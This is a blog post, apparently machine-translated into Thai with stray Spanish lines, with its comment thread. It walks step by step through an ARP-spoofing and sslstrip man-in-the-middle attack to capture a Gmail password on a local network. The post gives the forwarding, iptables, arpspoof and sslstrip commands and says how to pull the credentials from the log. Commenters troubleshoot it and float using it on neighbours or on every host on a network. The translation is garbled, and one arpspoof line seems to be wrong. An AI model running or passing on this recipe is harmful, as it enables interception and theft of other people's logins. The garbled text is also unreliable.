สวัสดีชาวบล็อก
สำหรับวันนี้ฉันมีตัวอย่างเล็ก ๆ น้อย ๆ ว่าการเชื่อมต่อในเครือข่ายใด ๆ ที่ไม่มีความปลอดภัยอาจเป็นอันตรายได้อย่างที่พวกเราหลายคนชอบ
สำหรับวันนี้ฉันจะใช้ ArpSpoofing กับ Sslstrip เพื่อรับรหัสผ่าน Gmail เพื่อให้สภาพแวดล้อมควบคุมได้ดีขึ้นฉันได้สร้างบัญชีชื่อ "testarp@gmail.com"
และเนื่องจากฉันไม่ชอบคำนำมากนักเรามาทำธุรกิจกันดีกว่า
สิ่งแวดล้อม
สำหรับการทดสอบนี้เรามีดังต่อไปนี้:
1. ผู้โจมตี: เป็นคอมพิวเตอร์เดสก์ท็อปหรือเดสก์ท็อปของฉันที่มี Debian Wheezy จากที่เก็บคุณสามารถติดตั้งได้ sslสตริป y ดมกลิ่น ที่จะได้รับ การแอบถ่าย
2. เหยื่อ: เหยื่อเป็นแท็บเล็ต Android ที่ต้องการดูเมลของเขาผ่านเบราว์เซอร์เท่านั้น
3. สื่อ: ตรงกลางคือไฟล์ เราเตอร์ Cisco DPC2425
ที่อยู่
ที่อยู่ผู้โจมตี: 172.26.0.2
ที่อยู่เราเตอร์: 172.26.0.1
ที่อยู่ของเหยื่อ: 172.26.0.8
การโจมตี:
สิ่งแรกที่เราจะทำสำหรับการโจมตีนี้คือการเปิดใช้งานการส่งต่อเพื่อให้คอมพิวเตอร์ของเราสามารถส่งต่อข้อมูลไปยังเหยื่อโดยที่พวกเขาไม่รู้ตัว (มิฉะนั้นจะเป็นการโจมตีแบบปฏิเสธบริการ)
เพื่อที่เราจะใช้:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
แล้วเราจะได้สิ่งที่ต้องการได้อย่างไร?
ก่อนอื่นให้ป้อนอีเมลของเราบนแท็บเล็ต ขณะเข้าสู่ระบบเราจะเห็นว่ามีสิ่งต่างๆมากมายหลายพันรายการปรากฏบนคอนโซลของเรา
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
ด้วย Control + W เราค้นหาสิ่งที่เรียกว่า SECURE POST
แล้วเราจะเห็นอะไรแบบนี้
ในบรรดาบรรทัดใหญ่ที่มองไม่เห็นคืออีเมลและรหัสผ่านของเหยื่อ
เราจึงวิ่งไปทางขวาจนในที่สุดก็เห็นแสงสว่างที่ปลายอุโมงค์
ในอีกโอกาสหนึ่งเราจะมาดูกันว่าเราจะป้องกันตัวเองได้อย่างไรจากการโจมตี
ความนับถือ
ฉันใช้โอกาสนี้เพื่อบอกว่าเมื่อโพสต์เผยแพร่คำสั่งไม่ถูกต้อง
คำสั่ง iptables ในตอนท้ายไม่มี 8080 ที่ถูกทิ้งไว้ในบรรทัดอื่น แล้วคำสั่ง arpspoof ก็อยู่ในบรรทัดเดียวกัน แต่ละคำสั่งอยู่คนละบรรทัดกัน
หวังว่าผู้แก้ไขจะเห็นและสามารถแก้ไขได้
อาศิรพจน์
ฉันได้ทำการแก้ไขที่คุณพูดถึงเรียบร้อยแล้วใช่ไหม
หากคุณกำลังจะแทรกโค้ดในรายการที่ต้องการให้ใช้มุมมอง HTML และตรวจสอบว่าบทความนั้นถูกต้องก่อนที่จะส่งไปยังรอดำเนินการ ขอขอบคุณ.
เป็นเรื่องที่น่ารู้ว่าพวกเราที่ไม่มีความรู้นั้นช่างเปราะบางเหลือเกิน ข้อมูลที่ดีมากแม้ว่าฉันจะเข้าใจเรื่องเล็กน้อย แต่ฉันก็ตระหนักถึงความสำคัญ ขอขอบคุณ!
ความนับถือ
แต่จะใช้ได้เฉพาะในกรณีที่ผู้โจมตีและเหยื่ออยู่ในเครือข่ายเดียวกัน ไม่ว่าในกรณีใดฉันคิดว่าถ้า (อยู่ในเครือข่ายเดียวกัน) คุณเชื่อมต่อโดยใช้ HTTPS ซึ่งไม่เกิดขึ้นเนื่องจากข้อมูลถูกเข้ารหัสก่อนออกจากเครื่องของคุณ หากคุณเชื่อมต่อด้วย HTTP (ไม่มี S) ฉันคิดว่าแม้มองไปที่สายเคเบิลเครือข่ายคุณก็เห็นคีย์
มันไม่เป็นความจริง ฉันแฮ็ครหัสผ่าน gmail และหากคุณสังเกตเห็นว่า gmail ใช้ https ดังนั้น? ประเด็นคือแม้ว่า https จะปลอดภัย แต่ก็ขึ้นอยู่กับ http ดังนั้นจึงไม่ปลอดภัย
อย่าสารภาพมากเกี่ยวกับ https ว่า S ไม่ใช่สำหรับ Superman มันมีไว้เพื่อ "ปลอดภัย"
มันใช้งานได้โดยมีหรือไม่มี https ฉันได้ลองใช้ linux distro ที่เชี่ยวชาญกว่าแล้วและใช้งานได้โดยไม่มีปัญหา
คุณสามารถใช้เพื่อสอนบทเรียนแก่ผู้ที่ขโมย Wi-Fi ของคุณได้อย่างแม่นยำ 😀
ไม่มากก็น้อยเหมือนสิ่งที่พวกเขาพูดเมื่อนานมาแล้วในบล็อกของ Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia ยอดเยี่ยมมากมันทำอะไร! / แล้วพวกเขาก็บอกความหวาดระแวงของฉันทุกครั้งที่ฉันใช้ VPN เมื่อพวกเขาไปตรวจสอบบัญชีธนาคาร ... ) ยังไงก็ตามคุณต้องดูว่าคนที่ดูถูกเหยียดหยามในความคิดเห็นนั้นเป็นอย่างไร ... ถ้าในที่สุดมันก็ขโมย ...
ตอนนี้เราต้องเรียนรู้เกี่ยวกับวิธีสร้างและเสนอบริการ VPN ของคุณเอง
เรื่องราวที่คุณเชื่อมโยงนั้นน่าสนใจมากดูเหมือนว่าควรค่าแก่การเป็นหนังสือนวนิยายและทำให้ฉันจำได้ว่าเมื่อฉันใช้อินเทอร์เน็ตของเพื่อนบ้านและแม้ว่าฉันจะบอกว่าฉันรู้เรื่องนี้ แต่ฉันคิดว่าฉันไม่เคยเห็นมิติที่แท้จริงของอันตรายที่ฉันสามารถมีได้ สุดท้ายโชคดีสำหรับฉันพวกเขาเปลี่ยนรหัสผ่านเป็น WPA2 เท่านั้นและนั่นคือจุดเริ่มต้นเรื่องราวของฉันกับ ISP ฮ่าฮ่า
นั่นเป็นเหตุผลที่ชื่อกล่าวว่า Sslstrip กำลังดำเนินการอยู่
ใช้งานได้ตราบเท่าที่ผู้โจมตีอยู่ตรงกลาง
คุณทำงานกับปริซึมคลื่นใด - -
ไม่
คุณจะรออะไรเพื่อส่งคำขอ XD
ขอแสดงความนับถือ
โพสต์ที่ดี
น่าสนใจฉันจะทำการทดสอบทางการศึกษาในภายหลัง ... บางทีฉันอาจจะลบรหัสผ่านไปยัง WiFi และสนุกไปอีกหน่อย😛
คุณสามารถทำสิ่งที่คล้ายกันเพื่อส่งหน้าต่างๆไปยังหน้าที่เป้าหมายที่ร้องขอได้หรือไม่? ตัวอย่างเช่นพวกเขาต้องการเปิด Facebook และฉันเปลี่ยนเส้นทางไปที่ Google? 😛
ใช่. แต่มันเป็นม้วนที่แตกต่างกันมาก
บางทีฉันจะโพสต์ในภายหลัง
โพสต์ที่ดีมากหัวข้อเหล่านี้ให้ความรู้มากตอนนี้เราต้องสามารถตอบโต้การโจมตีนี้ได้เนื่องจากบางส่วน (เช่นฉัน) เชื่อมต่อกับเครือข่ายสาธารณะ (เช่นมหาวิทยาลัย) การหลีกเลี่ยงจะเป็นประโยชน์
ทักทาย!
มันไม่ได้ผลสำหรับฉัน🙁
มีบางอย่างทำให้ฉันล้มเหลวที่นี่นอกเหนือจากข้อเท็จจริงที่ว่าการเชื่อมต่อ https ถูกเข้ารหัสผ่านใบรับรองเซิร์ฟเวอร์ (เมื่อคุณมีใบรับรองในเครื่องของคุณเบราว์เซอร์ของคุณจะรับผิดชอบการเข้ารหัส) ด้วย iptables ที่คุณเปลี่ยนเส้นทางพอร์ต 80 (http) ไม่ใช่ 443 ซึ่งเป็น https
ฉันก็คิดแบบนั้นเหมือนกัน ประเด็นคือแม้ว่า https จะ "ปลอดภัย" แต่น่าเสียดายที่ขึ้นอยู่กับ http ดังนั้น sslstrip จึงใช้ประโยชน์จากสิ่งนั้นมันทำให้เบราว์เซอร์เชื่อว่ากำลังใช้ข้อมูลประจำตัว https แต่ไม่ใช่
อึศักดิ์สิทธิ์! แต่เบราว์เซอร์จะเห็นคำเตือนเช่น "ใบรับรองนี้มาจากไซต์ที่น่าสงสัยหรืออะไรทำนองนั้น" ... ฉันจะต้องทำการทดสอบ XD แน่นอน
ไม่มีอะไรออกมาอย่างแน่นอน
ในที่สุดมันก็ได้ผลสำหรับฉัน
ฉันเชื่อมต่อกับเครือข่าย WEP ด้วยรหัสผ่านและแสดงรหัสผ่านโดยตรง
แบบสอบถาม คุณสามารถทำขั้นตอนเดียวกันนี้ได้หรือไม่ แต่สำหรับคอมพิวเตอร์ทุกเครื่องที่เชื่อมต่อในเครือข่ายแทนที่จะมีเหยื่อคนเดียว
ใช่คุณสามารถ. แต่ฉันยังไม่ได้ทำการทดลอง ลองด้วยตัวคุณเองและบอกเราว่าคุณเป็นอย่างไร
สิ่งเดียวที่ฉันได้รับจากสิ่งนี้คือเครื่องของเหยื่อออฟไลน์ แต่ sslstrip ไม่แสดงอะไรเลย: /
คุณต้องปิดการใช้งานไฟร์วอลล์สักครู่ หรืออย่างน้อยก็เปิดใช้งานการเชื่อมต่อขาเข้า
โพรบและฉันสามารถเห็นชื่อผู้ใช้และรหัสผ่านของหน้า Facebook เท่านั้นใน gmail ฉันไม่พบผลลัพธ์ใด ๆ ในบันทึกและฉันต้องการเพียงบรรทัดของ arpspoof « arpspoof -i -t « ในทางกลับกันเครื่องเหยื่อไม่สามารถเปิดบางเพจได้ ฉันจะดำเนินการตรวจสอบต่อไปมันน่าสนใจมาก ความช่วยเหลือสำหรับผู้ที่ใช้ Manjaro แพ็คเกจที่จะติดตั้ง ได้แก่ dsniff (ในที่นี้คือ arpspoff), twisted และ python2-pyopenssl สามารถดาวน์โหลด Sslstrip ได้จากที่นี่: http://www.thoughtcrime.org/software/sslstrip/
เพื่อเรียกใช้ $ python2 sslstrip.py
อาศิรพจน์
มันไม่ออกมา แต่บรรทัด arpspoof คือ #arpspoof -i int -t ip-เหยื่อ ip-router
ดูสิฉันทำตามที่คุณพูด:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
ปัญหาคือเหยื่อที่เป็นพีซีเครื่องอื่นที่ฉันมีที่นี่ในห้องของฉันฉันไม่มีการเชื่อมต่อกับจุดที่ฉันต้องรีสตาร์ทเราเตอร์ฉันจะช่วยอะไรได้บ้าง
อีกสิ่งหนึ่งที่ฉันกำลังทำงานกับเครื่องเสมือนและเมื่อฉันรันคำสั่ง iwconfig wlan0 จะไม่ปรากฏขึ้นและเมื่อฉันรัน ifconfig อย่างไรก็ตามหากฉันมีอินเทอร์เน็ตบนเครื่องเสมือนของฉันด้วยอินเทอร์เฟซ eth0